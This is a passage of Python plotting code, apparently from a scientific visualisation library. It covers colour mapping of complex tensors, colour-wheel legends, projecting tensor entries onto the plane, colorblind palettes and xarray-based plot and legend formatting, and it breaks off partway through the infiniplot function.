kind of cutoff?\n raise NotImplementedError(\"log scale not implemented.\")\n else:\n # more robust way to 'flatten' the perceived magnitude\n mapped_mag = arraymag**magscale\n\n if max_mag is None:\n max_mag = np.max(mapped_mag)\n\n hue = _compute_hue(zs)\n sat = mapped_mag / max_mag\n val = np.tile(1.0, hue.shape)\n zs = mpl.colors.hsv_to_rgb(np.stack((hue, sat, val), axis=-1))\n\n if alpha_map:\n # append alpha channel\n zalpha = (mapped_mag / max_mag)**alpha_pow\n zs = np.concatenate([zs, np.expand_dims(zalpha, -1)], axis=-1)\n\n return zs, mapped_mag, max_mag\n\n\ndef add_visualize_legend(\n ax,\n complexobj,\n max_mag,\n max_projections=2,\n auto_pad=0.03,\n legend_loc='auto',\n legend_size=0.15,\n legend_bounds=None,\n legend_resolution=3,\n):\n import matplotlib as mpl\n\n # choose where to put the legend\n if legend_bounds is None:\n if legend_loc == 'auto':\n if (max_projections <= 2):\n # move compass and legends beyond the plot rectangle, which\n # will be filled when there are only 2 plot dimensions\n legend_loc = (1 - auto_pad, 0.0 - legend_size + auto_pad)\n else:\n # occupy space within the rectangle\n legend_loc = (1.0 - legend_size, 0.0)\n legend_bounds = (*legend_loc, legend_size, legend_size)\n\n lax = ax.inset_axes(legend_bounds)\n lax.axis('off')\n lax.set_aspect('equal')\n\n num = legend_resolution * 2 + 1\n if complexobj:\n re = np.linspace(-1, 1, num=num).reshape(1, -1)\n im = 1j * np.linspace(1, -1, num=num).reshape(-1, 1)\n z = re + im\n else:\n re = np.linspace(-1, 1, num=num)\n # repeat a few times to make the bar thick enough\n z = np.tile(re, (max(1, legend_resolution // 3), 1))\n\n zmag = np.abs(z)\n mask = zmag > 1.0\n z[mask] = zmag[mask] = 0.0\n\n # compute the color for each point\n hue = _compute_hue(z)\n sat = zmag\n val = np.tile(1.0, hue.shape)\n\n # convert to rgb\n bars = mpl.colors.hsv_to_rgb(np.stack((hue, sat, val), axis=-1))\n # add alpha channel\n bars = np.concatenate([bars, np.tile(1.0, hue.shape + (1,))], -1)\n # add make area outside disk transparent\n bars[..., 3][mask] = 0.0\n\n # plot the actual colorbar legend\n lax.imshow(bars)\n\n # add axis orientation labels\n lax.text(1.02, 0.5, '$+1$', ha='left', va='center',\n transform=lax.transAxes, color=(.5, .5, .5), size=6)\n lax.text(-0.02, 0.5, '$-1$', ha='right', va='center',\n transform=lax.transAxes, color=(.5, .5, .5), size=6)\n if complexobj:\n lax.text(0.5, -0.02, '$-j$', ha='center', va='top',\n transform=lax.transAxes, color=(.5, .5, .5), size=6)\n lax.text(0.5, 1.02, '$+j$', ha='center', va='bottom',\n transform=lax.transAxes, color=(.5, .5, .5), size=6)\n\n # show the overall scale\n if complexobj:\n overall_scale_opts = {'x': .85, 'y': .15, 'ha': 'left'}\n else:\n overall_scale_opts = {'x': .5, 'y': -0.15, 'ha': 'center'}\n\n lax.text(\n s=f'$\\\\times {float(max_mag):.3}$', va='top',\n **overall_scale_opts, transform=lax.transAxes,\n color=(.5, .5, .5), size=6\n )\n\ndef make_ax_square_after_plotted(ax):\n xmin, xmax = ax.get_xlim()\n xrange = abs(xmax - xmin)\n ymin, ymax = ax.get_ylim()\n yrange = abs(ymax - ymin)\n\n # pad either x or y to make square\n if xrange > yrange:\n ypad = (xrange - yrange) / 2\n if ymin > ymax:\n # fipped y axis\n ax.set_ylim(ymin + ypad, ymax - ypad)\n else:\n ax.set_ylim(ymin - ypad, ymax + ypad)\n\n elif yrange > xrange:\n xpad = (yrange - xrange) / 2\n if xmin > xmax:\n # flipped x axis\n ax.set_xlim(xmin + xpad, xmax - xpad)\n else:\n ax.set_xlim(xmin - xpad, xmax + xpad)\n\n\ndef handle_sequence_of_arrays(f):\n \"\"\"Simple wrapper to handle sequence of arrays as input to e.g.\n ``visualize_tensor``.\n \"\"\"\n\n @functools.wraps(f)\n def wrapped(array, *args, show_and_close=True, **kwargs):\n import matplotlib.pyplot as plt\n\n if (\n isinstance(array, (tuple, list)) and\n all(hasattr(x, 'shape') for x in array)\n ):\n # assume sequence of tensors to plot\n figsize = kwargs.get('figsize', (5, 5))\n rasterize_dpi = kwargs.get('rasterize_dpi', 300)\n nplot = len(array)\n fig, axs = plt.subplots(\n 1, nplot, figsize=figsize, squeeze=False, sharey=True,\n )\n fig.set_dpi(rasterize_dpi)\n fig.patch.set_alpha(0.0)\n\n # plot all tensors with same magnitude scale\n kwargs.setdefault(\"max_mag\", max(np.max(np.abs(x)) for x in array))\n\n # only show legend on last plot\n legend = kwargs.pop('legend', False)\n\n for i in range(nplot):\n f(\n array[i], *args,\n ax=axs[0, i],\n # only show legend on last plot\n legend=(legend and i == nplot - 1),\n show_and_close=False,\n **kwargs\n )\n make_ax_square_after_plotted(axs[0, i])\n\n if show_and_close:\n plt.show()\n plt.close(fig)\n return fig, axs\n\n else:\n # treat as single tensor\n return f(array, *args, show_and_close=show_and_close, **kwargs)\n\n return wrapped\n\n\n@handle_sequence_of_arrays\n@show_and_close\ndef visualize_matrix(\n array,\n max_mag=None,\n magscale='linear',\n alpha_map=True,\n alpha_pow=1/2,\n legend=False,\n legend_loc='auto',\n legend_size=0.15,\n legend_bounds=None,\n legend_resolution=3,\n facecolor=None,\n rasterize=4096,\n rasterize_dpi=300,\n figsize=(5, 5),\n ax=None,\n):\n # can only plot numpy\n array = np.asarray(array)\n if array.ndim == 1:\n # draw vectors as diagonals\n array = np.diag(array)\n\n if isinstance(rasterize, (float, int)):\n # only turn on above a certain size\n rasterize = array.size > rasterize\n\n fig, ax = setup_fig_ax(\n facecolor=facecolor,\n rasterize=rasterize,\n rasterize_dpi=rasterize_dpi,\n figsize=figsize,\n ax=ax,\n )\n\n zs, _, max_mag = to_colors(\n array,\n magscale=magscale,\n max_mag=max_mag,\n alpha_map=alpha_map,\n alpha_pow=alpha_pow,\n )\n ax.imshow(zs, interpolation='nearest', zorder=-1)\n\n if legend:\n add_visualize_legend(\n ax=ax,\n complexobj=np.iscomplexobj(array),\n max_mag=max_mag,\n max_projections=2,\n legend_loc=legend_loc,\n legend_size=legend_size,\n legend_bounds=legend_bounds,\n legend_resolution=legend_resolution,\n )\n\n return fig, ax\n\n\n@handle_sequence_of_arrays\n@show_and_close\ndef visualize_tensor(\n array,\n max_projections=None,\n angles=None,\n scales=None,\n projection_overlap_spacing=1.05,\n skew_factor=0.05,\n spacing_factor=1.0,\n magscale='linear',\n size_map=True,\n size_pow=1/2,\n size_scale=1.0,\n alpha_map=True,\n alpha_pow=1/2,\n alpha=0.8,\n marker='o',\n linewidths=0,\n show_lattice=True,\n lattice_opts=None,\n compass=False,\n compass_loc='auto',\n compass_size=0.1,\n compass_bounds=None,\n compass_labels=None,\n compass_opts=None,\n max_mag=None,\n legend=False,\n legend_loc='auto',\n legend_size=0.15,\n legend_bounds=None,\n legend_resolution=3,\n interleave_projections=False,\n reverse_projections=False,\n facecolor=None,\n rasterize=4096,\n rasterize_dpi=300,\n figsize=(5, 5),\n ax=None,\n):\n \"\"\"Visualize all entries of a tensor, with indices mapped into the plane\n and values mapped into a color wheel.\n\n Parameters\n ----------\n array : numpy.ndarray\n The tensor to visualize.\n skew_factor : float, optional\n When there are more than two dimensions, a factor to scale the\n rotations by to avoid overlapping data points.\n size_map : bool, optional\n Whether to map the tensor value magnitudes to marker size.\n size_scale : float, optional\n An overall factor to scale the marker size by.\n alpha_map : bool, optional\n Whether to map the tensor value magnitudes to marker alpha.\n alpha_pow : float, optional\n The power to raise the magnitude to when mapping to alpha.\n alpha : float, optional\n The overall alpha to use for all markers if ``not alpha_map``.\n show_lattice : bool, optional\n Show a small grey dot for every 'lattice' point regardless of value.\n lattice_opts : dict, optional\n Options to pass to ``maplotlib.Axis.scatter`` for the lattice points.\n linewidths : float, optional\n The linewidth to use for the markers.\n marker : str, optional\n The marker to use for the markers.\n figsize : tuple, optional\n The size of the figure to create, if ``ax`` is not provided.\n ax : matplotlib.Axis, optional\n The axis to draw to. If not provided, a new figure will be created.\n\n Returns\n -------\n fig : matplotlib.Figure\n The figure containing the plot, or ``None`` if ``ax`` was provided.\n ax : matplotlib.Axis\n The axis containing the plot.\n \"\"\"\n import matplotlib as mpl\n\n # can only plot numpy\n array = np.asarray(array)\n\n if isinstance(rasterize, (float, int)):\n # only turn on above a certain size\n rasterize = array.size > rasterize\n\n fig, ax = setup_fig_ax(\n facecolor=facecolor,\n rasterize=rasterize,\n rasterize_dpi=rasterize_dpi,\n figsize=figsize,\n ax=ax,\n )\n\n auto_angles = angles is None\n if scales == \"equal\":\n scales = [1] * array.ndim\n auto_scales = scales is None\n\n if max_projections is None:\n max_projections = array.ndim\n\n # map each dimension to an angle\n if not auto_angles:\n angles = np.array(angles)\n else:\n # if max_projections == array.ndim, then each dimension has its own\n # angle, if max_projections < array.dim, then we will\n # reuse the same angles, initially round robin distributed\n angles = np.tile(\n np.linspace(0.0, np.pi, max_projections, endpoint=False),\n array.ndim // max_projections + 1\n )[:array.ndim]\n\n if not interleave_projections:\n # 'fill up' one angle before moving on, rather than round-robin,\n # doing this matches the behavior of fusing adjacent dimensions\n angles = np.sort(angles)\n\n def angle_modulate(x):\n return x * (x - np.pi / 2) * (x - x[-1])\n\n # modulate the angles slightly to avoid overlapping data points\n angles += angle_modulate(angles) * skew_factor\n\n if auto_scales:\n scales = np.empty(angles.shape)\n else:\n scales = np.array(scales)\n\n # the logic here is, when grouping dimensions into the same angles we\n # need to offset each overlapping dimension by increasing amount\n first_size = {}\n grouped_size = {}\n group_counter = {}\n group_rank = {}\n fastest_varying = []\n\n iphis = list(enumerate(angles))\n if not reverse_projections:\n iphis.reverse()\n\n for i, phi in iphis:\n if phi not in first_size:\n # first time we have encountered an axis at this angle\n fastest_varying.append((i, array.shape[i]))\n first_size[phi] = array.shape[i]\n grouped_size[phi] = array.shape[i]\n group_counter[phi] = 1\n else:\n # already an axis at this angle, space this one larger\n grouped_size[phi] *= array.shape[i]\n group_counter[phi] += 1\n\n # what rank among axes at this angle is i?\n group_rank[i] = group_counter[phi]\n\n if auto_scales:\n scales[i] = (\n grouped_size[phi] // array.shape[i]\n # put extra space between distinct dimensions\n * projection_overlap_spacing**group_counter[phi]\n # account for spacing out of first dimensions\n / max(1, (first_size[phi] - 1))**spacing_factor\n )\n\n eff_width = max(grouped_size.values())\n eff_ndim = max_projections\n\n # define the core mappings of coordinate to 2D plane\n\n def xcomponent(i, coo):\n return scales[i] * np.sin(angles[i]) * coo\n\n def ycomponent(i, coo):\n return scales[i] * -np.cos(angles[i]) * coo\n\n # compute projection into 2D coordinates for every index location\n coos = np.indices(array.shape)\n x = np.zeros(array.shape)\n y = np.zeros(array.shape)\n for i, coo in enumerate(coos):\n x += xcomponent(i, coo)\n y += ycomponent(i, coo)\n\n # compute colors\n zs, mapped_mag, max_mag = to_colors(\n array.flat,\n magscale=magscale,\n max_mag=max_mag,\n alpha_map=alpha_map,\n alpha_pow=alpha_pow,\n )\n\n # compute a sensible base size based on expected density of points\n base_size = size_scale * 3000 / (eff_width * eff_ndim**1.2)\n if size_map:\n s = base_size * (mapped_mag / max_mag)**size_pow\n else:\n s = base_size\n\n if show_lattice:\n # put a small grey line on every edge\n ls = []\n for i, isize in fastest_varying:\n other_shape = array.shape[:i] + array.shape[i + 1:]\n other_coos = np.indices(other_shape)\n coo_start = np.insert(other_coos, i, 0, 0)\n coo_stop = np.insert(other_coos, i, isize - 1, 0)\n\n xi = np.zeros(coo_start.shape)\n yi = np.zeros(coo_start.shape)\n\n for i, coo in enumerate(coo_start):\n xi += xcomponent(i, coo)\n yi += ycomponent(i, coo)\n\n xf = np.zeros(coo_start.shape)\n yf = np.zeros(coo_start.shape)\n\n for i, coo in enumerate(coo_stop):\n xf += xcomponent(i, coo)\n yf += ycomponent(i, coo)\n\n li = np.stack((xi.flat, yi.flat), 1)\n lf = np.stack((xf.flat, yf.flat), 1)\n\n ls.append(np.stack((li, lf), 1))\n\n segments = np.concatenate(ls)\n\n lattice_opts = {} if lattice_opts is None else dict(lattice_opts)\n lattice_opts.setdefault('color', (.6, .6, .6))\n lattice_opts.setdefault(\n 'alpha',\n 0.01 + 2**(-(array.size**0.2 + eff_ndim**0.8))\n )\n lattice_opts.setdefault('linewidth', 1)\n lattice_opts.setdefault('zorder', -2)\n lines = mpl.collections.LineCollection(segments, **lattice_opts)\n ax.add_collection(lines)\n\n # plot the actual points\n ax.scatter(\n # mapped variables\n # (reverse the data so that the correct points are shown on top)\n x=x.flat[::-1],\n y=y.flat[::-1],\n c=zs[::-1],\n s=s[::-1] if size_map else s,\n # constants\n alpha=None if alpha_map else alpha, # folded into color if alpha_map\n linewidths=linewidths,\n marker=marker,\n zorder=-1,\n clip_on=False,\n )\n\n if compass:\n # choose where to put the compass\n if compass_bounds is None:\n if compass_loc == 'auto':\n if (max_projections <= 2):\n # move compass and legends beyond the plot rectangle, which\n # will be filled when there are only 2 plot dimensions\n compass_loc = (-0.05, 1.0 - compass_size + 0.05)\n else:\n # occupy space within the rectangle\n compass_loc = (0.0, 1 - compass_size)\n compass_bounds = (*compass_loc, compass_size, compass_size)\n\n cax = ax.inset_axes(compass_bounds)\n cax.axis('off')\n cax.set_aspect('equal')\n\n compass_opts = {} if compass_opts is None else dict(compass_opts)\n compass_opts.setdefault('color', (0.5, 0.5, 0.5))\n compass_opts.setdefault('width', 0.002)\n compass_opts.setdefault('length_includes_head', True)\n\n if compass_labels is None:\n compass_labels = range(len(angles))\n elif compass_labels is False:\n compass_labels = [''] * len(angles)\n\n for i, phi in enumerate(angles):\n dx = np.sin(phi) * group_rank[i]\n dy = -np.cos(phi) * group_rank[i]\n cax.arrow(0, 0, dx, dy, **compass_opts)\n cax.text(\n dx, dy, f\" {compass_labels[i]}\",\n ha='left', va='top',\n color=compass_opts['color'],\n size=6,\n rotation=180 * phi / np.pi - 90,\n rotation_mode='anchor',\n )\n\n if legend:\n add_visualize_legend(\n ax=ax,\n complexobj=np.iscomplexobj(array),\n max_mag=max_mag,\n max_projections=max_projections,\n legend_loc=legend_loc,\n legend_size=legend_size,\n legend_bounds=legend_bounds,\n legend_resolution=legend_resolution,\n )\n\n return fig, ax\n\n\n@functools.lru_cache(16)\ndef get_neutral_style(draw_color=(.5, .5, .5)):\n return {\n 'axes.edgecolor': draw_color,\n 'axes.facecolor': (0, 0, 0, 0),\n 'axes.grid': True,\n 'axes.labelcolor': draw_color,\n 'axes.spines.right': False,\n 'axes.spines.top': False,\n 'figure.facecolor': (0, 0, 0, 0),\n 'grid.alpha': 0.1,\n 'grid.color': draw_color,\n 'legend.frameon': False,\n 'text.color': draw_color,\n 'xtick.color': draw_color,\n 'xtick.minor.visible': True,\n 'ytick.color': draw_color,\n 'ytick.minor.visible': True,\n }\n\n\ndef use_neutral_style(fn):\n import matplotlib as mpl\n\n @functools.wraps(fn)\n def new_fn(\n *args,\n use_neutral_style=True,\n draw_color=(.5, .5, .5),\n **kwargs\n ):\n if not use_neutral_style:\n return fn(*args, **kwargs)\n\n style = get_neutral_style(draw_color=draw_color)\n\n with mpl.rc_context(style):\n return fn(*args, **kwargs)\n\n return new_fn\n\n\n# colorblind palettes by Bang Wong (https://www.nature.com/articles/nmeth.1618)\n\n_COLORS_DEFAULT = (\n '#56B4E9', # light blue\n '#E69F00', # orange\n '#009E73', # green\n '#D55E00', # red\n '#F0E442', # yellow\n '#CC79A7', # purple\n '#0072B2', # dark blue\n)\n_COLORS_SORTED = (\n '#0072B2', # dark blue\n '#56B4E9', # light blue\n '#009E73', # green\n '#F0E442', # yellow\n '#E69F00', # orange\n '#D55E00', # red\n '#CC79A7', # purple\n)\n\n\ndef mod_sat(c, mod):\n \"\"\"Modify the luminosity of rgb color ``c``.\n \"\"\"\n from matplotlib.colors import hsv_to_rgb, rgb_to_hsv\n\n h, s, v = rgb_to_hsv(c[:3])\n return (*hsv_to_rgb((h, mod * s, v)), 1.0)\n\n\ndef auto_colors(N):\n import math\n from matplotlib.colors import LinearSegmentedColormap\n\n if N < len(_COLORS_DEFAULT):\n return _COLORS_DEFAULT[:N]\n\n cmap = LinearSegmentedColormap.from_list('wong', _COLORS_SORTED)\n\n xs = list(map(cmap, np.linspace(0, 1.0, N)))\n\n # modulate color saturation with sine to generate local distinguishability\n # ... but only turn on gradually for increasing number of nodes\n sat_mod_period = min(4, N / 7)\n sat_mod_factor = max(0.0, 2 / 3 * math.tanh((N - 7) / 4))\n\n return [\n mod_sat(\n c, 1 - sat_mod_factor * math.sin(math.pi * i / sat_mod_period)**2\n )\n for i, c in enumerate(xs)\n ]\n\n\ndef color_to_colormap(c, vdiff=0.5, sdiff=0.25):\n import matplotlib as mpl\n rgb = mpl.colors.to_rgb(c)\n h, s, v = mpl.colors.rgb_to_hsv(rgb)\n\n vhi = min(1.0, v + vdiff / 2)\n vlo = max(0.0, vhi - vdiff)\n vhi = vlo + vdiff\n\n shi = min(1.0, s + sdiff / 2)\n slo = max(0.0, shi - sdiff)\n shi = slo + sdiff\n\n hsv_i = (h, max(slo, 0.0), min(vhi, 1.0))\n hsv_f = (h, min(shi, 1.0), max(vlo, 0.0))\n\n c1 = mpl.colors.hsv_to_rgb(hsv_i)\n c2 = mpl.colors.hsv_to_rgb(hsv_f)\n cdict = {\n 'red': [(0.0, c1[0], c1[0]), (1.0, c2[0], c2[0])],\n 'green': [(0.0, c1[1], c1[1]), (1.0, c2[1], c2[1])],\n 'blue': [(0.0, c1[2], c1[2]), (1.0, c2[2], c2[2])],\n }\n return mpl.colors.LinearSegmentedColormap('', cdict)\n\n\ndef get_default_cmap(i, vdiff=0.5, sdiff=0.25):\n return color_to_colormap(_COLORS_DEFAULT[i], vdiff=vdiff, sdiff=sdiff)\n\n\ndef to_colormap(c, **autohue_opts):\n import numbers\n import matplotlib as mpl\n from matplotlib import pyplot as plt\n\n if isinstance(c, mpl.colors.Colormap):\n return c\n\n if isinstance(c, numbers.Number):\n return cimple(c, **autohue_opts)\n\n try:\n return plt.get_cmap(c)\n except ValueError:\n return color_to_colormap(c)\n\n\ndef _make_bold(s):\n return r'$\\bf{' + s.replace('_', r'\\_') + r'}$'\n\n\n_LINESTYLES_DEFAULT = (\n 'solid',\n (0.0, (3, 1)),\n (0.5, (1, 1)),\n (1.0, (3, 1, 1, 1)),\n (1.5, (3, 1, 3, 1, 1, 1)),\n (2.0, (3, 1, 1, 1, 1, 1)),\n)\n\n\n_MARKERS_DEFAULT = (\n 'o',\n 'X',\n 'v',\n 's',\n 'P',\n 'D',\n '^',\n 'h',\n '*',\n 'p',\n '<',\n 'd',\n '8',\n '>',\n 'H',\n)\n\n\ndef init_mapped_dim(\n sizes,\n domains,\n values,\n labels,\n mapped,\n base_style,\n ds,\n name,\n dim,\n order=None,\n dim_label=None,\n custom_values=None,\n default_values=None,\n):\n if isinstance(dim, (tuple, list)) and all(x in ds.dims for x in dim):\n # create a new nested effective dimension\n new_dim = \", \".join(dim)\n ds = ds.stack({new_dim: dim})\n dim = new_dim\n\n elif (dim is not None) and (dim not in ds.dims):\n # attribute is just manually specified, not mapped to dimension\n base_style[name] = dim\n sizes[name] = 1\n return ds, None\n\n if (dim is not None) and (order is not None):\n # select and order along dimension\n ds = ds.sel({dim: list(order)})\n\n if dim is not None:\n ds = ds.dropna(dim, how='all')\n\n domains[name] = ds[dim].values\n sizes[name] = len(domains[name])\n labels[dim] = _make_bold(dim) if dim_label is None else dim_label\n mapped.add(dim)\n\n if custom_values is None:\n if default_values is not None:\n if callable(default_values):\n # allow default values to depend on number of values\n default_values = default_values(sizes[name])\n\n values[name] = tuple(\n x for x, _ in zip(default_values, range(sizes[name]))\n )\n else:\n values[name] = custom_values\n\n else:\n sizes[name] = 1\n\n return ds, dim\n\n\ndef _do_axes_formatting(\n axs,\n col,\n row,\n labels,\n domains,\n sizes,\n x,\n y,\n grid,\n grid_which,\n grid_alpha,\n xlim,\n ylim,\n xscale,\n yscale,\n xbase,\n ybase,\n hspans,\n span_color,\n span_alpha,\n span_linestyle,\n span_linewidth,\n vspans,\n):\n # perform axes level formatting\n from matplotlib.ticker import (\n AutoMinorLocator,\n LogLocator,\n NullFormatter,\n ScalarFormatter,\n StrMethodFormatter,\n )\n\n for (i, j), ax in np.ndenumerate(axs):\n\n # only change this stuff if we created the figure\n title = []\n if col is not None:\n title.append(f\"{labels[col]}={domains['col'][j]}\")\n if row is not None:\n title.append(f\"{labels[row]}={domains['row'][i]}\")\n if title:\n title = \", \".join(title)\n ax.text(0.5, 1.0, title, transform=ax.transAxes,\n horizontalalignment='center', verticalalignment='bottom')\n\n # only label outermost plot axes\n if i + 1 == sizes[\"row\"]:\n ax.set_xlabel(labels[x])\n if j == 0:\n ax.set_ylabel(labels[y])\n\n # set some nice defaults\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n\n if grid:\n ax.grid(True, which=grid_which, alpha=grid_alpha)\n ax.set_axisbelow(True)\n\n if xlim is not None:\n ax.set_xlim(xlim)\n if ylim is not None:\n ax.set_ylim(ylim)\n\n if xscale is not None:\n ax.set_xscale(xscale)\n if yscale is not None:\n ax.set_yscale(yscale)\n\n for scale, base, axis in [\n (xscale, xbase, ax.xaxis),\n (yscale, ybase, ax.yaxis),\n ]:\n if scale == 'log':\n axis.set_major_locator(LogLocator(base=base, numticks=6))\n if base != 10:\n if isinstance(base, int):\n axis.set_major_formatter(StrMethodFormatter(\"{x:.0f}\"))\n else:\n axis.set_major_formatter(ScalarFormatter())\n if base < 3:\n subs = [1.5]\n else:\n subs = np.arange(2, base)\n axis.set_minor_locator(LogLocator(base=base, subs=subs))\n axis.set_minor_formatter(NullFormatter())\n elif scale == 'symlog':\n # TODO: choose some nice defaults\n pass\n else:\n axis.set_minor_locator(AutoMinorLocator(5))\n\n for hline in hspans:\n ax.axhline(hline, color=span_color, alpha=span_alpha,\n linestyle=span_linestyle, linewidth=span_linewidth)\n for vline in vspans:\n ax.axvline(vline, color=span_color, alpha=span_alpha,\n linestyle=span_linestyle, linewidth=span_linewidth)\n\n\ndef _create_legend(\n axs,\n legend_opts,\n handles,\n legend_merge,\n legend_entries,\n legend_labels,\n legend_extras,\n hue,\n hue_order,\n color,\n color_order,\n marker,\n marker_order,\n markersize,\n markersize_order,\n markeredgecolor,\n markeredgecolor_order,\n linewidth,\n linewidth_order,\n linestyle,\n linestyle_order,\n labels,\n legend_reverse,\n legend_ncol,\n sizes,\n split_handles,\n base_style,\n):\n from matplotlib.lines import Line2D\n\n try:\n # try to extend current legend with more entries\n legend_handles = axs[0, -1].get_legend().get_lines()\n legend_handles.append(\n Line2D([0], [0], markersize=0, linewidth=0, label='')\n )\n except AttributeError:\n legend_handles = []\n\n legend_opts = {} if legend_opts is None else legend_opts\n\n if handles and legend_merge:\n # show every unique style combination as single legend try\n\n if legend_entries:\n # only keep manually specified legend entries\n remove = set()\n for k in handles:\n for dim, val in k:\n if dim in legend_entries:\n if val not in legend_entries[dim]:\n remove.add(k)\n for k in remove:\n del handles[k]\n\n sorters = []\n legend_title = []\n for dim, dim_order in [\n (hue, hue_order),\n (color, color_order),\n (marker, marker_order),\n (markersize, markersize_order),\n (markeredgecolor, markeredgecolor_order),\n (linewidth, linewidth_order),\n (linestyle, linestyle_order),\n ]:\n if dim is not None and labels[dim] not in legend_title:\n # check if not in legend_title, as multiple attributes can\n # be mapped to the same dimension\n legend_title.append(labels[dim])\n\n if dim is not None and dim_order is not None:\n sorters.append((dim, dim_order.index))\n else:\n sorters.append((dim, lambda x: x))\n\n def legend_sort(key_handle):\n loc = dict(key_handle[0])\n return tuple(\n sorter(loc.get(dim, None)) for dim, sorter in sorters\n )\n\n legend_handles.extend(\n v for _, v in\n sorted(\n handles.items(), key=legend_sort, reverse=legend_reverse\n )\n )\n\n if legend_ncol is None:\n if sizes[\"color\"] == 1 or len(handles) <= 10:\n legend_ncol = 1\n else:\n legend_ncol = sizes[\"hue\"]\n\n legend_opts.setdefault('title', ', '.join(legend_title))\n legend_opts.setdefault('ncol', legend_ncol)\n\n elif split_handles:\n # separate legend for each style\n\n if legend_entries:\n # only keep manually specified legend entries\n for k, vals in legend_entries.items():\n split_handles[k] = {\n key: val for key, val in split_handles[k].items()\n if key in vals\n }\n\n base_style[\"color\"] = (0.5, 0.5, 0.5)\n base_style[\"marker\"] = ''\n base_style[\"linestyle\"] = ''\n\n ncol = len(split_handles)\n nrow = max(map(len, split_handles.values()))\n\n for legend_dim, inputs in split_handles.items():\n legend_handles.append(\n Line2D(\n [0], [0],\n markersize=0,\n linewidth=0,\n label=labels[legend_dim]\n )\n )\n for key, style in sorted(\n inputs.items(),\n key=lambda x: x[0],\n # key=lambda x: 1,\n reverse=legend_reverse,\n ):\n\n if any(\"marker\" in prop for prop in style):\n style.setdefault('marker', 'o')\n if any(\"line\" in prop for prop in style):\n style.setdefault('linestyle', '-')\n if 'color' in style:\n style.setdefault('marker', '.')\n style.setdefault('linestyle', '-')\n\n legend_handles.append(\n Line2D([0], [0], **{**base_style, **style}, label=str(key))\n )\n\n if legend_ncol is None:\n npad = nrow - len(inputs)\n else:\n npad = 1\n for _ in range(npad):\n legend_handles.append(\n Line2D([0], [0], markersize=0, linewidth=0, label='')\n )\n\n if legend_ncol is None:\n legend_opts.setdefault('ncol', ncol)\n\n if legend_extras is not None:\n for extra in legend_extras:\n if not isinstance(extra, Line2D):\n extra = Line2D([0], [0], **extra)\n legend_handles.append(extra)\n else:\n legend_handles = None\n\n if legend_labels is not None:\n\n for lh, label in zip(legend_handles, legend_labels):\n lh.set_label(label)\n\n if legend_handles is not None:\n lax = axs[0, -1]\n legend_opts.setdefault('loc', 'upper left')\n legend_opts.setdefault('bbox_to_anchor', (1.0, 1.0))\n legend_opts.setdefault('columnspacing', 1.0)\n legend_opts.setdefault('edgecolor', 'none')\n legend_opts.setdefault('framealpha', 0.0)\n lax.legend(handles=legend_handles, **legend_opts)\n\n\n@show_and_close\n@use_neutral_style\ndef infiniplot(\n ds,\n x,\n y=None,\n z=None,\n *,\n bins=None,\n bins_density=True,\n aggregate=None,\n aggregate_method='median',\n aggregate_err_range=0.5,\n err=None,\n err_style=None,\n err_kws=None,\n xlink=None,\n color=None,\n colors=None,\n color_order=None,\n color_label=None,\n colormap_start=0.0,\n colormap_stop=1.0,\n hue=None,\n hues=None,\n hue_order=None,\n hue_label=None,\n palette=None,\n autohue_start=0.6,\n autohue_sweep=-1.0,\n autohue_opts=None,\n marker=None,\n markers=None,\n marker_order=None,\n marker_label=None,\n markersize=None,\n markersizes=None,\n markersize_order=None,\n markersize_label=None,\n markeredgecolor='white',\n markeredgecolor_order=None,\n markeredgecolor_label=None,\n markeredgecolors=None,\n linewidth=None,\n linewidths=None,\n linewidth_order=None,\n linewidth_label=None,\n linestyle=None,\n linestyles=None,\n linestyle_order=None,\n linestyle_label=None,\n text=None,\n text_formatter=str,\n text_opts=None,\n col=None,\n col_order=None,\n col_label=None,\n row=None,\n row_order=None,\n row_label=None,\n alpha=1.0,\n join_across_missing=False,\n err_band_alpha=0.1,\n err_bar_capsize=1,\n xlabel=None,\n ylabel=None,\n xlim=None,\n ylim=None,\n xscale=None,\n yscale=None,\n xbase=10,\n ybase=10,\n vspans=(),\n hspans=(),\n span_color=(0.5, 0.5, 0.5),\n span_alpha=0.5,\n span_linewidth=1,\n span_linestyle=':',\n grid=True,\n grid_which='major',\n grid_alpha=0.1,\n legend=True,\n legend_ncol=None,\n legend_merge=False,\n legend_reverse=False,\n legend_entries=None,\n legend_labels=None,\n legend_extras=None,\n legend_opts=None,\n title=None,\n ax=None,\n axs=None,\n format_axs=None,\n figsize=None,\n height=3,\n width=None,\n hspace=0.12,\n wspace=0.12,\n sharex=True,\n sharey=True,\n **kwargs,\n):\n \"\"\"\n Parameters\n ----------\n ds : xarray.Dataset\n Dataset to plot.\n x : str\n Name of x-axis dimension.\n y : str\n Name of y-axis dimension.\n aggregate : str or tuple[str], optional\n Name of dimension(s) to aggregate before plotting.\n aggregate_method : str, optional\n Aggregation method used to show main line.\n aggregate_err_range : float, optional\n Inter-quantile range to use to show aggregation bands.\n \"\"\"\n import matplotlib as mpl\n from matplotlib import pyplot as plt\n\n autohue_opts = {} if autohue_opts is None else autohue_opts\n autohue_opts.setdefault(\"val1\", 1.0)\n autohue_opts.setdefault(\"sat1\", 0.3)\n autohue_opts.setdefault(\"val2\", 0.6)\n\n if text is not None:\n text_opts = {} if text_opts is None else text_opts\n text_opts.setdefault('size', 6)\n text_opts.setdefault('horizontalalignment', 'left')\n text_opts.setdefault('verticalalignment', 'bottom')\n text_opts.setdefault('clip_on', True)\n\n if err_kws is None:\n err_kws = {}\n\n # if only one is specified allow it to be either\n if (hue is not None) and (color is None):\n color, color_order, colors = hue, hue_order, hues\n hue = hue_order = hues = None\n\n # default style options\n base_style = {\n 'alpha': alpha,\n 'markersize': 6,\n 'color': '#0ca0eb',\n 'marker': '.',\n 'markeredgecolor': 'white',\n }\n # the size of each mapped dimension\n sizes = {}\n # the domain (i.e. input) of each mapped dimension\n domains = {}\n # the range (i.e. output) of each mappend dimension\n values = {}\n # how to label each mapped dimension\n labels = {\n x: x if xlabel is None else xlabel,\n y: y if ylabel is None else ylabel,\n }\n\n # work out all the dim mapping information\n\n def default_colormaps(N):\n if N <= 0:\n hs = _COLORS_DEFAULT[:N]\n else:\n hs = np.linspace(\n autohue_start, autohue_start + autohue_sweep, N, endpoint=False\n )\n return [to_colormap(h, **autohue_opts) for h in hs]\n\n # drop irrelevant variables and dimensions\n ds = ds.drop_vars([k for k in ds if k not in (x, y, z, err)])\n possible_dims = set()\n if x in ds.data_vars:\n possible_dims.update(ds[x].dims)\n if y in ds.data_vars:\n possible_dims.update(ds[y].dims)\n if z in ds.data_vars:\n 